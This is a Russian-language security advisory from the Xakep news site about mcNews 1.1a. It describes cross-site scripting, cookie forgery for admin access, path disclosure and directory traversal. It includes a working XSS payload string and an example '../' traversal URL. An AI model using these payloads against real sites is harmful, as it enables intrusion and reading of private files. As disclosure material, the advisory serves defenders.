Продукты «Хакера»

  • Ежеквартальный «Хакер» #3

    Ежеквартальный «Хакер» #3

    Лучшие статьи квартала на бумаге

    2 000 ₽

    Заказать журнал
  • Годовая подписка на Xakep.ru

    Годовая подписка на Xakep.ru

    Полный доступ к статьям и архиву выпусков

    6 000 ₽ в год

    Подписаться
  • «Пентест WEB» для начинающих

    «Пентест WEB» для начинающих

    Совместный курс «Хакера» и лаборатории «Хаксет»

    7 000 ₽

    Купить курс
  • Спецвыпуск «Хакера» #4

    Спецвыпуск «Хакера» #4

    Лучшие статьи за 2021–2022 годы на бумаге

    2 000 ₽

    Заказать журнал

mcNews- набор сценариев, позволяющих
управлять новостями на Web странице. Обнаружено несколько уязвимостей - Межсайтовый скриптинг, раскрытие пути, раскрытие файла и административный доступ. 

Межсайтовый скриптинг:

/admin/login.php?path="></form*><form name=a><input 
name=i value=XSS><script>alert(document.a.i.value) 
</script> 

Административный доступ:

Удаленный атакующий тривиально может подменить куки и получить административный доступ. 

Раскрытие пути:

Запрос /admin/[header or design].php?voir=1&skinfile=non- existant-file выдаст полный путь к www root. Полученная информация может использоваться в дальнейших нападениях. 

Раскрытие файла:

Запрос, содержащий последовательность '../', приведет к раскрытию любого файла на системе:
http://target/admin/header.php?voir=hop&skinfile=../../file 

Уязвимость обнаружена в mcNews 1.1а.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии